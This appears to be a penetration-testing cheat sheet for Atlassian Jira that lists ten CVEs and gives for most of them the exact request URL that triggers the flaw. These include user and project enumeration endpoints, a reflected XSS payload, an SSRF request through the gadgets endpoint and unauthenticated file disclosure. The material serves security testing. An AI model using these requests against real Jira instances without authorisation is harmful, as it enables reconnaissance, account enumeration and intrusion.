| Index | Technique |
|---|---|
| 1 | CVE-2020-14179 (Information Disclosure) |
| 2 | CVE-2020-14181 (User Enumeration) |
| 3 | CVE-2020-14178 (Project Key Enumeration) |
| 4 | CVE-2019-3402 (XSS) |
| 5 | CVE-2019-11581 (SSTI) |
| 6 | CVE-2019-3396 (Path Traversal) |
| 7 | CVE-2019-8451 (SSRF) |
| 8 | CVE-2019-8449 (User Information Disclosure) |
| 9 | CVE-2019-3403 (User Enumeration) |
| 10 | CVE-2019-8442 (Sensitive Information Disclosure) |
| 11 | Tools |
| 12 | Reports |
a. Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.
a. Navigate to <JIRA_URL>/secure/ViewUserHover.jspa?username=<uname>
a. Navigate to <JIRA_URL>/browse.<project_key>
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
a. Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
a. Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
a. Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
a. Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.
a. Navigate to <Jira_URL>/rest/api/2/user/picker?query=<user_name_here>
b. Observe the difference in response when valid vs. invalid user is queried.
a. Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.
Nuclei Template can be used to automate most of these CVEs Detection.